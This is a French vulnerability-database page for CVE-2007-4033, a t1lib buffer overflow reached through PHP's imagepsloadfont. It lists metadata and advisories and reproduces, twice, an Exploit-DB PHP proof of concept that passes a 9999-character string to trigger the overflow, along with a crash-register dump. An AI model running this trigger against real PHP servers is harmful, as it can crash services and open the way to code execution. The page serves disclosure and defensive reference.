CVE-2007-4033 : Détail

CVE-2007-4033

Overflow
9%V3
Network
2007-07-27
20h00 +00:00
2018-10-15
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the intT1_EnvGetCompletePath function in lib/t1lib/t1env.c in t1lib 5.1.1 allows context-dependent attackers to execute arbitrary code via a long FileName parameter. NOTE: this issue was originally reported to be in the imagepsloadfont function in php_gd2.dll in the gd (PHP_GD2) extension in PHP 5.2.3.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 30401

Date de publication : 2007-07-25 22h00 +00:00
Auteur : r0ut3r
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/25079/info T1lib is prone to a buffer-overflow vulnerability because the library fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. An attacker can exploit this issue to execute arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts will likely trigger crashes, denying service to legitimate users. We do not know which versions of T1lib are affected. <?php /* PHP imagepsloadfont Buffer Overflow Vulnerability Discovered & Coded by: r0ut3r (writ3r [at] gmail.com) Vulnerable dll: php_gd2.dll - Tested on WinXP SP0, PHP/5.2.3, Apache 2.2.4 The argument given was A * 9999 Access violation when reading [41414151] ---------------------------------------- Registers: ---------- EAX 77F76238 ntdll.77F76238 ECX 77C2AB33 MSVCRT.77C2AB33 EDX 01543260 php_gd2.01543260 EBX 41414141 ESP 00C0FD58 EBP 00C0FD90 ESI 41414141 EDI 00222738 EIP 77F53284 ntdll.77F53284 C 0 ES 0023 32bit 0(FFFFFFFF) P 0 CS 001B 32bit 0(FFFFFFFF) A 1 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 0038 32bit 7FFDE000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty +UNORM 7D18 00560000 00561378 ST1 empty +UNORM 2402 0012BCD0 00000001 ST2 empty +UNORM 17CD 77F516F5 FFFFFFFF ST3 empty 0.0889391783750232330e-4933 ST4 empty +UNORM 0082 0017020C 77D43A5F ST5 empty +UNORM 0002 77D489FF 00000000 ST6 empty 10000.00000000000000 ST7 empty 10000.00000000000000 3 2 1 0 E S P U O Z D I FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 Proof of concept below: */ if (!extension_loaded("gd")) die("PHP_GD2 extension not loaded!"); $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n"; ?>
Exploit Database EDB-ID : 4227

Date de publication : 2007-07-25 22h00 +00:00
Auteur : r0ut3r
EDB Vérifié : Yes

<?php /* PHP imagepsloadfont Buffer Overflow Vulnerability Discovered & Coded by: r0ut3r (writ3r [at] gmail.com) Vulnerable dll: php_gd2.dll - Tested on WinXP SP0, PHP/5.2.3, Apache 2.2.4 The argument given was A * 9999 Access violation when reading [41414151] ---------------------------------------- Registers: ---------- EAX 77F76238 ntdll.77F76238 ECX 77C2AB33 MSVCRT.77C2AB33 EDX 01543260 php_gd2.01543260 EBX 41414141 ESP 00C0FD58 EBP 00C0FD90 ESI 41414141 EDI 00222738 EIP 77F53284 ntdll.77F53284 C 0 ES 0023 32bit 0(FFFFFFFF) P 0 CS 001B 32bit 0(FFFFFFFF) A 1 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 0038 32bit 7FFDE000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty +UNORM 7D18 00560000 00561378 ST1 empty +UNORM 2402 0012BCD0 00000001 ST2 empty +UNORM 17CD 77F516F5 FFFFFFFF ST3 empty 0.0889391783750232330e-4933 ST4 empty +UNORM 0082 0017020C 77D43A5F ST5 empty +UNORM 0002 77D489FF 00000000 ST6 empty 10000.00000000000000 ST7 empty 10000.00000000000000 3 2 1 0 E S P U O Z D I FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 Proof of concept below: */ if (!extension_loaded("gd")) die("PHP_GD2 extension not loaded!"); $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n"; ?> # milw0rm.com [2007-07-26]

Products Mentioned

Configuraton 0

Php>>Php >> Version 5.2.3

T1lib>>T1lib >> Version 5.1.1

Références

http://security.gentoo.org/glsa/glsa-200710-12.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/27743
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/26901
Tags : third-party-advisory, x_refsource_SECUNIA
http://fedoranews.org/updates/FEDORA-2007-234.shtml
Tags : vendor-advisory, x_refsource_FEDORA
http://www.debian.org/security/2007/dsa-1390
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/27297
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-200805-13.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.redhat.com/support/errata/RHSA-2007-1031.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=MDKSA-2007:189
Tags : vendor-advisory, x_refsource_MANDRIVA
https://www.exploit-db.com/exploits/4227
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/30168
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/27239
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/26241
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/25079
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/27718
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-200711-34.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/28345
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/27599
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-515-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/27439
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1018905
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/26981
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2007-1027.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2007-1030.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=MDKSA-2007:230
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/26992
Tags : third-party-advisory, x_refsource_SECUNIA